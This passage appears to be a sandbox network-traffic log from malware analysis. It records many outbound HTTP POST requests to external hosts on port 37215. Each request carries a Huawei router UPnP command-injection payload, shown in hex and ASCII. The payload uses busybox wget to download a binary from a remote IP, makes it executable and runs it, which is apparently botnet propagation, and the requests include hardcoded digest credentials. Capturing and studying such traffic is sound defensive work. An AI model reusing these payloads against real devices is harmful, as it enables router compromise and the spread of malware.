2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2092192.168.2.155317841.165.104.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668459892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2093192.168.2.153758441.115.25.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668504000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2094192.168.2.155531241.88.247.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668541908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2095192.168.2.155264641.153.58.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668543100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2096192.168.2.153884241.79.180.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668586016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2097192.168.2.154590841.89.196.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668586016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2098192.168.2.153779041.73.118.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668606043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2099192.168.2.154014641.119.255.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668610096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2100192.168.2.155270041.154.4.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668611050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2101192.168.2.154168641.214.27.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668663025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2102192.168.2.154580241.136.228.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669605970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
